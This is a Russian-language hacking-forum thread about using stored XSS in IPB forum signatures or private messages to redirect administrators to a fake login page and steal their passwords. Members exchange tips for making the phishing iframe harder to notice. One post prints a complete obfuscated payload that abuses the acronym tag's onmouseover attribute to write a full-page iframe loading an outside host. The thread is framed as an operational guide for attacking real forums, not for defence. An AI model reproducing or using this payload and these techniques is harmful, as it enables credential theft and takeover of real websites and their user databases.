Взлом БД через форум с xss

[towner]

Кста, не обязательно писать в личку админу, достаточно оставить сообщение в теме, в которую админ заходит, и когда он её откроет его перекинет на фейк.Лично я оставил пост в новостях

[m0nk]

Об этом я знаю, кстати если в подписе нельзя вставить код то можно вставить в сообщение (ЛС)

[samyrai5]

вот а есле я сделал фейк а админ неперейдет по немогу тогда я пас некак неузнаю?

[[Tiger]]

Цитата: Сообщение от samyrai5 вот а есле я сделал фейк а админ неперейдет по немогу тогда я пас некак неузнаю?

он должен его ввести туда=))

[m0nk]

Цитата: Сообщение от samyrai5 вот а есле я сделал фейк а админ неперейдет по немогу тогда я пас некак неузнаю?

ты кидаешь ему лс, он заходит в него и его автоматичекски кидает на фейк, адрес остаеться такой же но страница фейковая

[pickwick]

Видео по созданию фейка.
[Ссылки могут видеть только зарегистрированные пользователи. ]
Пасс: zhyk.ru
автор monk

[MAXIMICH]

А кто знает как сделать так, чтобы прокрутка (скрол) была только вертикальная? ато некоторые форумы не влазят, а горизонтальная прокрутка палит сильно) И еще как можно небольшие белые полоски сверху и сбоку убрать, потому как если дизайн форума не белый, то тоже немного палится)

[Excellent18rus]

+время убирайте,т.к оно на месте остается...

[m0nk]

Цитата: Сообщение от Jumper_UA я то не против насчет темки, но все таки задумался... Жук говорил, что он против того чтобы на ЖУКЕ (для этого есть дарквеб - проект жука №2) выкладывали всевозможные уязвимости форумов или взломов. Так как это не баг игры, а баг конкретного движка. Т.Е. КАК можно быть против выкладывания сплоитов и всевозможных багов форумов или просто сайтов и в это время самому контролировать чтобы их все таки выкладывали?) кто не понял - пропустите мимо ушей! еще раз говорю, тема стоящая, НО это не относится к ла2, разве только что БД слить, и то это можно отнести не только к БД ла2, а к другой БД. Я просто про то говорю, что либо выкладывать и ничего не говорить, либо не выкладывать вообще и тогда можно говорить что форум не относится к взломам других сайтов или форумов. кто прочитал - молодец! и он потратил минуту своей жизни на лабуду

Жук, скартезе и т.д. говорили мне выложить лучше на ДВ. Но думаешь там бы его заметили? Он бы остался незамеченным, как иголка в стоге сена.

Цитата: Сообщение от MAXIMICH А кто знает как сделать так, чтобы прокрутка (скрол) была только вертикальная? ато некоторые форумы не влазят, а горизонтальная прокрутка палит сильно) И еще как можно небольшие белые полоски сверху и сбоку убрать, потому как если дизайн форума не белый, то тоже немного палится)

в коде вместо x20width=100%\x20height=100% вставь x20width=1024\x20height=768 белых полосок должно быть невидно

и попробуй вместо x20scrolling=no на x20scrolling=yes

[Fix]

Цитата: Сообщение от MAXIMICH А кто знает как сделать так, чтобы прокрутка (скрол) была только вертикальная? ато некоторые форумы не влазят, а горизонтальная прокрутка палит сильно) И еще как можно небольшие белые полоски сверху и сбоку убрать, потому как если дизайн форума не белый, то тоже немного палится)

В скролле пишеш=no - горизонтальный скролл.

какие такие полоски ?

[MAXIMICH]

Цитата: В первом скролле пишеш =yes - вертикальный скролл; Во втором - горизонтальный скролл.

Так в коде только 1 скролл x20scrolling )

[SnOoPKa]

Проделываю все как показанно в видео уроке, но при вставке кода XSS в пдпись... в подписи нечего не высвечивается что делать? Подскажите плиз! Значит у меня на форуме такое не работает ?

[m0nk]

ссылка на форум кинь

[SnOoPKa]

[Ссылки могут видеть только зарегистрированные пользователи. ] Получается вот так [Ссылки могут видеть только зарегистрированные пользователи. ]

PHP код:

[acronym=test1[acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+1*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://palacheldar.hut2.ru/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]_]___________________________________________________________________________[/acronym]_[/acronym][/size][/color] 


[pickwick]

При виде вот такого окошечка для вxода и регистрации, можете быть уверенными там работать не будет, т.к. это новая версия ipb и тег акроним там отключен.
[Ссылки могут видеть только зарегистрированные пользователи. ]